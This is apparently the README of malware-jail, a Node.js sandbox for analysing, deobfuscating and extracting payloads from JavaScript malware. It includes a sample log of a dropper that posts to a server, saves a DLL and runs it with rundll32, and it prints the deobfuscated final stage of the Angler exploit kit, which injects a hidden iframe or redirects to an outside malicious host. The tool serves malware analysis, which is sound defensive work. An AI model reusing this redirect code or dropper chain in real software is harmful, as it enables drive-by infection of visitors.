Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js
malware-jail is written for Node's 'vm' sandbox. Currently implements WScript (Windows Scripting Host) context env/wscript.js, at least the part frequently used by malware. Internet browser context is partialy implemented env/browser.js.
Runs on any operating system, tested on Linux (Node v4.2.1).
malware-jail requires minimist, and xmlhttprequest and entities npm packages, you may install them with:
npm install
or
npm install minimist xmlhttprequest entities iconv-lite
Be careful when working with a real malware. A malware, which is aware of this sandbox, may try to escape and harm your PC. It's recommended you run it either from an unpriviledged Linux account or from within virtualized Windows machine. Angler files in the malware folder are NOT disarmed.
bash@linux# node jailme.js -h -b list
20 Feb 21:16:09 - Malware sandbox ver. 0.4
20 Feb 21:16:09 - ------------------------
20 Feb 21:16:09 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-o ofile] [-b id] \
20 Feb 21:16:09 - [-s odir] [--down=y] [malware1 [malware2] .. ]
20 Feb 21:16:09 - -e ifile ... js that simulates specific environment
20 Feb 21:16:09 - -o ofile ... name of the file where sandbox shall be dumped at the end
20 Feb 21:16:09 - -s odir ... output directory for generated files (malware payload)
20 Feb 21:16:09 - -b id ... browser type, use -b list for possible values
20 Feb 21:16:09 - --down=y ... use http request to download malware components automatically
20 Feb 21:16:09 - malware ... js with the malware code
20 Feb 21:16:09 - If no arguments are specified the default values are taken from config.json
20 Feb 21:16:09 - Possible -b values: [ 'IE11_W10', 'IE8', 'iPhone', 'Firefox', 'Chrome' ]
In the examples folder you may find a deactivated malware file. Run the analysis with:
node jailme.js malware/example.js
or just simply:
node jailme.js
Internet browser based malware you may test with
node jailme.js -b IE11_W10 malware/example_browser.js
The malware/example.js is the default malware file configured in config.json.
After analysis the complete sandbox context is dumped to a file 'sandbox_dump_after.json'. There you may find:
- _eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.
- _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
- _wscript_urls - all URLs that the malware intended to GET or POST.
- _wscript_objects - WScript or ActiveX objects created.
_'sandbox_dump_after.json' uses JSONPath, implemented by JSON-js/cycle.js, to save duplicated or cyclic references to a same object.
bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json
In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf
Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler_full.html.
Strip the non Angler part and save as malware/angler_stripped.html.
Remove <script>
tags and convert required <div>
tags into:
document._addElementById(id, content);
and save as malware/angler.js.
Run the analysis:
node jailme.js malware/angler.js
Eventually capture the output into angler_output.txt:
node jailme.js malware/angler.js > angler_output.txt
Deobfuscating the final stage:
function() {
if (document.body != null && typeof document.body != "undefined") {
clearInterval(zfxhYOGvfrlHUNJrZufQnWPtohkYAQEEdV);
if (typeof window["v_bcd50d9482665cd4e129a272c76799e6"] == "undefined") {
window["v_bcd50d9482665cd4e129a272c76799e6"] = 1;
var YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr = (DfPJmMLOnxPanSoeHQuOrDdSoCPJGAaRhYURtgyUD() && CCtJDLZQbieboJvsIyatBMZhUvTpzaQcyCXR());
var YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW = !YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr && !!window.chrome && window.navigator.vendor === "Google Inc.";
var rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia = -1;
var NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS = "http://beladonna33.ga/052F";
if (hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW() && rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia == 1) {
if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
location.replace(NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS)
} else {
window.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS;
document.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS
}
} else {
if ((YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr && !YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW && !hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW())) {
var blDiNORLBvDHjFRqgxXSMVgnfhriGmw = "<div style=\"position:absolute;left:-2808px;\"><iframe width=\"27px\" src=\"" + NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS + "\" height=\"27px\"></iframe></div>";
var wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL = document.getElementsByTagName("div");
if (wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length == 0) {
document.body.innerHTML = document.body.innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw
} else {
var dl_name = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length;
var eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc = Math.floor((dl_name / 2));
wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw
}
}
}
}
OncYaaSjwrEWhyHWevaHtkypMUSZxnIrtIK()
}
}
The MIT License (MIT)
Copyright (c) 2016 Hynek Petrak
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.